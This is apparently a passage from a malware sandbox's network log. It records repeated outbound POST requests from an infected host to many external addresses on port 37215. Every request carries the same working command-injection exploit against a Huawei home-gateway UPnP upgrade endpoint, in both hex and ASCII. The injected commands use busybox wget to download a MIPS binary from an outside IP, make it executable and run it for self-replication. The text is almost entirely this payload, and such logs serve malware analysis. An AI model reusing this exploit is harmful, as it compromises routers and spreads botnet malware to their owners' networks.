                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          831192.168.2.1560460128.72.106.9337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.682276011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          832192.168.2.154533241.91.248.21237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.687483072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          833192.168.2.1558128154.52.205.23137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.634280920 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          834192.168.2.1544028157.68.218.2637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.634367943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          835192.168.2.1552364197.237.182.16637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.634406090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          836192.168.2.1537174157.147.47.13137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.634550095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          837192.168.2.1549486197.187.144.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.648516893 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          838192.168.2.1541418181.49.217.4737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.648531914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          839192.168.2.154626841.219.58.15637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.648576021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          840192.168.2.1543328157.136.29.5937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.648601055 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
